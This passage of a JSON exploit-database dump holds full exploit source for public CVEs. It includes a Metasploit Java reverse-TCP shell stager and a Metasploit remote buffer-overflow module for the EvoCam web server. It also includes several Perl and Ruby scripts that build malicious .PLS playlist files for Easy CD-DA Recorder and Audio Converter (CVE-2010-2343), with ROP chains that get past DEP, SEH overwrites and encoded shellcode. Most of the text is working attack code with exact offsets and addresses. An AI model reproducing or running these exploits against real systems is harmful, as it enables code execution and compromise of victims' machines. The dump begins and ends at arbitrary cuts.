"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb"}, {"lastseen": "2019-11-05T01:46:19", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). 
Connect back stager\n", "modified": "2017-11-21T19:53:33", "published": "2010-07-20T00:53:24", "id": "MSF:PAYLOAD/JAVA/SHELL/REVERSE_TCP", "href": "", "type": "metasploit", "title": "Command Shell, Java Reverse TCP Stager", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/core/payload/java/reverse_tcp'\n\nmodule MetasploitModule\n\n CachedSize = 5303\n\n include Msf::Payload::Stager\n include Msf::Payload::Java\n include Msf::Payload::Java::ReverseTcp\n\n def initialize(info={})\n super(merge_info(info,\n 'Name' => 'Java Reverse TCP Stager',\n 'Description' => 'Connect back stager',\n 'Author' => ['mihi', 'egypt'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Convention' => 'javasocket',\n 'Stager' => {'Payload' => ''}\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/java/reverse_tcp.rb"}, {"lastseen": "2019-11-27T05:07:29", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in the web server provided with the EvoCam program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6, 3.6.7, and possibly earlier versions as well. 
EvoCam version 3.6.8 fixes the vulnerability.\n", "modified": "2017-09-08T01:18:50", "published": "2010-06-09T16:40:48", "id": "MSF:EXPLOIT/OSX/HTTP/EVOCAM_WEBSERVER", "href": "", "type": "metasploit", "title": "MacOS X EvoCam HTTP GET Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MacOS X EvoCam HTTP GET Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the web server provided with the EvoCam\n program for Mac OS X. We use Dino Dai Zovi's exec-from-heap technique to copy the payload\n from the non-executable stack segment to heap memory. Vulnerable versions include 3.6.6,\n 3.6.7, and possibly earlier versions as well. EvoCam version 3.6.8 fixes the vulnerability.\n },\n 'Author' =>\n [\n 'Paul Harrington', # Original Exploit Author and MSF Module\n 'dookie', # MSF Module Assistance\n ],\n 'Platform' => 'osx',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2010-2309'],\n ['OSVDB', '65043'],\n ['EDB', '12835'],\n ],\n 'Payload' =>\n {\n 'Space' => 300,\n 'BadChars' => \"\\x00\\xff\\x09\\x0a\\x0b\\x0c\\x0c\\x0d\\x20\",\n 'StackAdjustment' => -3500,\n },\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Mac OS X 10.5.8 x86, EvoCam 3.6.6',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 1560,\n 'Writable' => 0x8fe66448,\n 'setjmp' => 0x8fe1cf38,\n 'strdup' => 0x8fe210dc,\n 'jmp_eax' => 0x8fe01041\n }\n ],\n [ 'Mac OS X 10.5.8 x86, EvoCam 3.6.7',\n {\n 'Arch' => ARCH_X86,\n 'Offset' => 1308,\n 'Writable' => 0x8fe66448,\n 'setjmp' => 0x8fe1cf38,\n 'strdup' => 0x8fe210dc,\n 'jmp_eax' => 0x8fe01041\n }\n ],\n\n ],\n 'DisclosureDate' => 'Jun 01 2010',\n 'DefaultTarget' => 1))\n\n register_options(\n [\n Opt::RPORT(8080),\n 
])\n end\n\n def make_exec_payload_from_heap_stub()\n frag0 =\n \"\\x90\" + # nop\n \"\\x58\" + # pop eax\n \"\\x61\" + # popa\n \"\\xc3\" # ret\n\n frag1 =\n \"\\x90\" + # nop\n \"\\x58\" + # pop eax\n \"\\x89\\xe0\" + # mov eax, esp\n \"\\x83\\xc0\\x0e\" + # add eax, byte +0xc\n \"\\x89\\x44\\x24\\x08\" + # mov [esp+0x8], eax\n \"\\xc3\" # ret\n\n setjmp = target['setjmp']\n writable = target['Writable']\n strdup = target['strdup']\n jmp_eax = target['jmp_eax']\n\n exec_payload_from_heap_stub =\n frag0 +\n [setjmp].pack('V') +\n [writable + 32, writable].pack(\"V2\") +\n frag1 +\n \"X\" * 20 +\n [setjmp].pack('V') +\n [writable + 24, writable, strdup, jmp_eax].pack(\"V4\") +\n \"X\" * 4\n end\n\n def exploit\n connect\n\n offset = target['Offset']\n\n buffer = \"GET \"\n buffer << rand_text_alpha_upper(offset)\n buffer << make_exec_payload_from_heap_stub()\n buffer << \"\\x90\\x90\"\n buffer << payload.encoded\n buffer << \" HTTP/1.0\\r\\n\\r\\n\"\n\n sock.put(buffer)\n sock.close\n\n handler()\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/http/evocam_webserver.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:33", "bulletinFamily": "exploit", "description": "", "modified": "2014-02-13T00:00:00", "published": "2014-02-13T00:00:00", "href": "https://packetstormsecurity.com/files/125195/Easy-CD-DA-Recorder-PLS-Buffer-Overflow.html", "id": "PACKETSTORM:125195", "type": "packetstorm", "title": "Easy CD-DA Recorder PLS Buffer Overflow", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Easy CD-DA Recorder PLS Buffer 
Overflow', \n'Description' => %q{ \nThis module exploits a stack-based buffer overflow vulnerability in \nEasy CD-DA Recorder 2007, caused by a long string in a playlist entry. \nBy persuading the victim to open a specially-crafted .PLS file, a \nremote attacker could execute arbitrary code on the system or cause \nthe application to crash. This module has been tested successfully on \nWindows XP SP3 and Windows 7 SP1. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'chap0', # Vulnerability discovery and original exploit \n'Gabor Seljan', # Metasploit module \n'juan vazquez' # Improved reliability \n], \n'References' => \n[ \n[ 'BID', '40631' ], \n[ 'EDB', '13761' ], \n[ 'OSVDB', '65256' ], \n[ 'CVE', '2010-2343' ], \n[ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ] \n], \n'DefaultOptions' => \n{ \n'ExitFunction' => 'process' \n}, \n'Platform' => 'win', \n'Payload' => \n{ \n'DisableNops' => true, \n'BadChars' => \"\\x0a\\x3d\", \n'Space' => 2454, \n'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # ADD ESP,-3500 \n}, \n'Targets' => \n[ \n[ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)', \n# easycdda.exe 3.0.114.0 \n# audconv.dll 7.0.815.0 \n{ \n'Offset' => 1108, \n'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll] \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jun 7 2010', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ false, 'The file name.', 'msf.pls']) \n], \nself.class) \n \nend \n \ndef nops \nreturn make_nops(4).unpack(\"V\").first \nend \n \ndef rop_nops(n = 1) \n# RETN (ROP NOP) [audconv.dll] \n[0x1003d55d].pack('V') * n \nend \n \ndef exploit \n \n# ROP chain generated by mona.py - See corelan.be \nrop_gadgets = \n[ \n0x1007261e, # POP EDX # RETN [audconv.dll] \n0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe] \n0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll] \n0x10035802, # XCHG EAX,ESI # RETN [audconv.dll] \n0x1005d288, # POP EBP # RETN 
[audconv.dll] \n0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe] \n0x1005cc2d, # POP EBX # RETN [audconv.dll] \n0x00000996, # 0x00000996-> EBX \n0x1008740c, # POP EDX # RETN [audconv.dll] \n0x00000040, # 0x00000040-> EDX \n0x1001826d, # POP ECX # RETN [audconv.dll] \n0x004364c6, # &Writable location [easycdda.exe] \n0x00404aa9, # POP EDI # RETN [easycdda.exe] \n0x100378e6, # RETN (ROP NOP) [audconv.dll] \n0x0042527d, # POP EAX # RETN [easycdda.exe] \nnops, \n0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe] \n].flatten.pack('V*') \n \nsploit = rop_nops(target['Offset'] / 4) \nsploit << [0x1003d55c].pack(\"V\") # pop edi # ret [audconv.dll] \nsploit << [target.ret].pack(\"V\") \nsploit << rop_nops(22) \nsploit << rop_gadgets \nsploit << payload.encoded \nsploit << rand_text_alpha_upper(10000) # Generate exception \n \n# Create the file \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \nfile_create(sploit) \n \nend \nend \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/125195/easycdda_pls_bof.rb.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T15:08:55", "bulletinFamily": "exploit", "description": "Easy CD-DA Recorder - (PLS File) Buffer Overflow. CVE-2010-2343. 
Local exploit for windows platform", "modified": "2014-02-13T00:00:00", "published": "2014-02-13T00:00:00", "id": "EDB-ID:31643", "href": "https://www.exploit-db.com/exploits/31643/", "type": "exploitdb", "title": "Easy CD-DA Recorder - PLS File Buffer Overflow", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::FILEFORMAT\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack-based buffer overflow vulnerability in\r\n Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.\r\n By persuading the victim to open a specially-crafted .PLS file, a\r\n remote attacker could execute arbitrary code on the system or cause\r\n the application to crash. 
This module has been tested successfully on\r\n Windows XP SP3 and Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'chap0', # Vulnerability discovery and original exploit\r\n 'Gabor Seljan', # Metasploit module\r\n 'juan vazquez' # Improved reliability\r\n ],\r\n 'References' =>\r\n [\r\n [ 'BID', '40631' ],\r\n [ 'EDB', '13761' ],\r\n [ 'OSVDB', '65256' ],\r\n [ 'CVE', '2010-2343' ],\r\n [ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => 'process'\r\n },\r\n 'Platform' => 'win',\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'BadChars' => \"\\x0a\\x3d\",\r\n 'Space' => 2454,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # ADD ESP,-3500\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',\r\n # easycdda.exe 3.0.114.0\r\n # audconv.dll 7.0.815.0\r\n {\r\n 'Offset' => 1108,\r\n 'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jun 7 2010',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])\r\n ],\r\n self.class)\r\n\r\n end\r\n\r\n def nops\r\n return make_nops(4).unpack(\"V\").first\r\n end\r\n\r\n def rop_nops(n = 1)\r\n # RETN (ROP NOP) [audconv.dll]\r\n [0x1003d55d].pack('V') * n\r\n end\r\n\r\n def exploit\r\n\r\n # ROP chain generated by mona.py - See corelan.be\r\n rop_gadgets =\r\n [\r\n 0x1007261e, # POP EDX # RETN [audconv.dll]\r\n 0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]\r\n 0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]\r\n 0x10035802, # XCHG EAX,ESI # RETN [audconv.dll]\r\n 0x1005d288, # POP EBP # RETN [audconv.dll]\r\n 0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]\r\n 0x1005cc2d, # POP EBX # RETN [audconv.dll]\r\n 0x00000996, # 0x00000996-> EBX\r\n 0x1008740c, # POP EDX # RETN [audconv.dll]\r\n 0x00000040, # 
0x00000040-> EDX\r\n 0x1001826d, # POP ECX # RETN [audconv.dll]\r\n 0x004364c6, # &Writable location [easycdda.exe]\r\n 0x00404aa9, # POP EDI # RETN [easycdda.exe]\r\n 0x100378e6, # RETN (ROP NOP) [audconv.dll]\r\n 0x0042527d, # POP EAX # RETN [easycdda.exe]\r\n nops,\r\n 0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]\r\n ].flatten.pack('V*')\r\n\r\n sploit = rop_nops(target['Offset'] / 4)\r\n sploit << [0x1003d55c].pack(\"V\") # pop edi # ret [audconv.dll]\r\n sploit << [target.ret].pack(\"V\")\r\n sploit << rop_nops(22)\r\n sploit << rop_gadgets\r\n sploit << payload.encoded\r\n sploit << rand_text_alpha_upper(10000) # Generate exception\r\n\r\n # Create the file\r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n file_create(sploit)\r\n\r\n end\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/31643/"}, {"lastseen": "2016-02-01T18:25:48", "bulletinFamily": "exploit", "description": "Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM. CVE-2010-2343. 
Local exploit for windows platform", "modified": "2010-06-07T00:00:00", "published": "2010-06-07T00:00:00", "id": "EDB-ID:13763", "href": "https://www.exploit-db.com/exploits/13763/", "type": "exploitdb", "title": "Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit ROP/WPM 0day", "sourceData": "#***********************************************************************************\r\n# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM\r\n# Date : 07/06/2010\r\n# Author : Sud0\r\n# Bug found by : chap0\r\n# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html\r\n# Version : 8.1\r\n# OS : Windows\r\n# Tested on : XP SP3 En (VirtualBox)\r\n# Type of vuln : SEH\r\n# Thanks to my wife for her support\r\n# Thanks for chap0 for bringing us the game\r\n# Greetz to: Corelan Security Team\r\n# mr_me you'r killing the ROP bro :)\r\n# http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n# Using ROP to bypass DEP protection and call WPM\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. 
\r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#***********************************************************************************\r\n#code :\r\nprint \"|------------------------------------------------------------------|\\n\";\r\nprint \"| __ __ |\\n\";\r\nprint \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\n\";\r\nprint \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\\n\";\r\nprint \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\n\";\r\nprint \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\\n\";\r\nprint \"| |\\n\";\r\nprint \"| http://www.corelan.be:8800 |\\n\";\r\nprint \"| |\\n\";\r\nprint \"|-------------------------------------------------[ EIP Hunters ]--|\\n\\n\";\r\nprint \"[+] Exploit for .... \\n\";\r\n\r\nmy $filename=\"newaudio.pls\";\r\n# Small Shellcode to run calc\r\nmy $shellcode = \"\\x8B\\xEC\\x55\\x8B\\xEC\\x68\\x20\\x20\\x20\\x2F\\x68\\x63\\x61\\x6C\\x63\\x8D\\x45\\xF8\\x50\\xB8\\xC7\\x93\\xC2\\x77\\xFF\\xD0\";\r\n\r\nmy \t$buffer = \"A\" x 280; \t\t\t# some junk\r\n\t$buffer .= \"\\x31\\x2A\\x00\\x10\"; \t\t# mov eax,ebp / pop ebp / retn4\r\n\t$buffer .= \"B\" x 12; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t# add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 8;\t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / 
retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t$buffer .= \"\\x1D\\xA4\\x07\\x10\"; \t\t# NEXT : add eax,100 / pop ebp / retn\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk\r\n\t\r\n\t$buffer .= \"\\x00\\x8D\\x00\\x10\"; \t\t# POP EDI / RETN\r\n\t$buffer .= \"\\xB6\\x12\\x00\\x10\"; \t\t# ADD ESP,4 / RETN\r\n\t$buffer .= \"\\x05\\x21\\x00\\x10\"; \t\t# ADD ESP,14 / RETN\r\n\t$buffer .= \"B\" x 20 ; \t\t\t# some junk\r\n\t\r\n\t$buffer .= \"\\x79\\x84\\x02\\x10\"; \t\t# mov dword ptr ss:[esp + 10], eax / call EDI\r\n\t$buffer .= \"\\x13\\x22\\x80\\x7C\"; \t\t# @ of WPM\r\n\t$buffer .= \"\\xFF\\xFF\\xFF\\xFF\"; \t\t# RET after WPM choose one and use it\r\n\t$buffer .= \"\\xFF\\xFF\\xFF\\xFF\"; \t\t# -1 : means process itself\r\n\t$buffer .= \"\\xCF\\x22\\x80\\x7C\"; \t\t# Destination address\r\n\t$buffer .= \"B\" x 4 ; \t\t\t# some junk, @ of shellcode will land here\r\n\t$buffer .= \"\\x1A\\x00\\x00\\x00\"; \t\t# size of shellcode \r\n\t$buffer .= \"\\x00\\xA0\\x45\\x00\"; \t\t# Writeable memory \r\n\t$buffer .= \"B\" x 12;\t\t\t# some junk\r\n\t$buffer .= $shellcode;\r\n\r\n\t$buffer .= \"B\" x (4436 -length($buffer)); \t\t# some junk\r\n\t$buffer .= \"\\x2F\\x37\\x01\\x10\"; \t\t# SEH : add esp, 878 / retn 8\r\n\t$buffer .= \"A\" x 10000;\t\t\t# some junk\r\n\r\nprint \"Removing old $filename file\\n\";\r\nsystem(\"del $filename\");\r\nprint \"Creating new $filename file\\n\";\r\nopen(FILE, \">$filename\");\r\n\r\nprint FILE $buffer;\r\nclose(FILE);\r\n\r\n\r\n\r\n\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/13763/"}, {"lastseen": "2016-02-01T18:25:34", "bulletinFamily": "exploit", 
"description": "Easy CD-DA Recorder 2007 SEH Buffer Overflow. CVE-2010-2343. Local exploit for windows platform", "modified": "2010-06-07T00:00:00", "published": "2010-06-07T00:00:00", "id": "EDB-ID:13761", "href": "https://www.exploit-db.com/exploits/13761/", "type": "exploitdb", "title": "Easy CD-DA Recorder 2007 SEH Buffer Overflow", "sourceData": "# Exploit Title : Easy CD-DA Recorder 2007 SEH Buffer Overflow \r\n# Date : June 7, 2010\r\n# Author : chap0 [http://www.seek-truth.net]\r\n# Software Link : http://download.cnet.com/Easy-CD-DA-Recorder/3000-2646_4-10059726.html\r\n# Tested on : Windows XP SP3 En\r\n# Type of vuln : SEH\r\n# Greetz to : Corelan Security Team\r\n# The Crew\t\t: http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n# Advisory\t\t: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048\r\n# --------------------------------------------------------------------------------------\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. 
\r\n# If you do, Corelan cannot be held responsible for any damages this may cause.\r\n#\r\n# Code :\r\nprint \"|------------------------------------------------------------------|\\n\";\r\nprint \"| __ __ |\\n\";\r\nprint \"| _________ ________ / /___ _____ / /____ ____ _____ ___ |\\n\";\r\nprint \"| / ___/ __ \\\\/ ___/ _ \\\\/ / __ `/ __ \\\\ / __/ _ \\\\/ __ `/ __ `__ \\\\ |\\n\";\r\nprint \"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\\n\";\r\nprint \"| \\\\___/\\\\____/_/ \\\\___/_/\\\\__,_/_/ /_/ \\\\__/\\\\___/\\\\__,_/_/ /_/ /_/ |\\n\";\r\nprint \"| |\\n\";\r\nprint \"| http://www.corelan.be:8800 |\\n\";\r\nprint \"| |\\n\";\r\nprint \"|-------------------------------------------------[ EIP Hunters ]--|\\n\\n\";\r\nprint \"[+] Exploit for Easy CD-DA Recorder \\n\";\r\nprint \"[+] Preparing payload\\n\";\r\nsleep(1);\r\nmy $junk=\"\\x41\" x 1108;\r\n\r\nmy $nseh=\"\\xeb\\x06\\x90\\x90\";\r\n\r\nmy $seh= \"\\x70\\x80\\x08\\x10\"; # ppr 0x10088070 [audconv.dll] \r\n\r\nmy $nops=\"\\x90\" x 24;\r\n\r\nmy 
$shellcode=\r\n\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\".\r\n\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\".\r\n\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\".\r\n\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\".\r\n\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x54\".\r\n\"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x44\\x4e\\x53\\x4b\\x48\\x4e\\x47\".\r\n\"\\x45\\x50\\x4a\\x37\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x44\\x4a\\x51\\x4b\\x38\".\r\n\"\\x4f\\x35\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x54\\x4b\\x38\\x46\\x43\\x4b\\x38\".\r\n\"\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x38\\x42\\x4c\".\r\n\"\\x46\\x47\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e\".\r\n\"\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x42\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x38\".\r\n\"\\x4f\\x45\\x46\\x52\\x41\\x30\\x4b\\x4e\\x48\\x36\\x4b\\x58\\x4e\\x50\\x4b\\x34\".\r\n\"\\x4b\\x58\\x4f\\x35\\x4e\\x51\\x41\\x50\\x4b\\x4e\\x4b\\x38\\x4e\\x31\\x4b\\x48\".\r\n\"\\x41\\x30\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x43\".\r\n\"\\x42\\x4c\\x46\\x56\\x4b\\x38\\x42\\x54\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x47\".\r\n\"\\x4e\\x30\\x4b\\x58\\x42\\x34\\x4e\\x30\\x4b\\x38\\x42\\x57\\x4e\\x51\\x4d\\x4a\".\r\n\"\\x4b\\x48\\x4a\\x36\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x48\\x42\\x58\\x42\\x4b\".\r\n\"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x38\\x4a\\x46\\x4e\\x53\\x4f\\x35\\x41\\x53\".\r\n\"\\x48\\x4f\\x42\\x56\\x48\\x55\\x49\\x48\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x37\".\r\n\"\\x42\\x45\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x30\\x4f\\x55\\x4a\\x46\\x4a\\x39\".\r\n\"\\x50\\x4f\\x4c\\x48\\x50\\x50\\x47\\x35\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x41\\x56\".\r\n\"\\x4e\\x46\\x43\\x46\\x42\\x30\\x5a\";\r\n\r\n$padding = \"\\x41\" x 10000;\r\n\r\nmy $payload = 
$junk.$nseh.$seh.$nops.$shellcode.$padding;\r\n\r\nopen (myfile, '>easy.pls');\r\n\r\nprint myfile $payload;\r\n\r\nclose (myfile);\r\n\r\nprint \"[+] Storm the Gates of Hell\\n\"", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/13761/"}, {"lastseen": "2016-02-01T18:25:24", "bulletinFamily": "exploit", "description": "Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit. CVE-2010-2343. Local exploit for windows platform", "modified": "2010-06-07T00:00:00", "published": "2010-06-07T00:00:00", "id": "EDB-ID:13760", "href": "https://www.exploit-db.com/exploits/13760/", "type": "exploitdb", "title": "Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit 0day", "sourceData": "#***********************************************************************************\r\n# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit\r\n# Date : 16/05/2010\r\n# Author : Sud0\r\n# Bug found by : chap0\r\n# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html\r\n# Version : 8.1\r\n# OS : Windows\r\n# Tested on : XP SP3 En (VirtualBox)\r\n# Type of vuln : SEH\r\n# Thanks to my wife for her support\r\n# Thanks for chap0 for bringing us the game\r\n# Greetz to: Corelan Security Team\r\n# http://www.corelan.be:8800/index.php/security/corelan-team-members/\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n# Script provided 'as is', without any warranty.\r\n# Use for educational purposes only.\r\n# Do not use this code to do anything illegal !\r\n# Corelan does not want anyone to use this script\r\n# for malicious and/or illegal purposes\r\n# Corelan cannot be held responsible for any illegal use.\r\n#\r\n# Note : you are not allowed to edit/modify this code. 
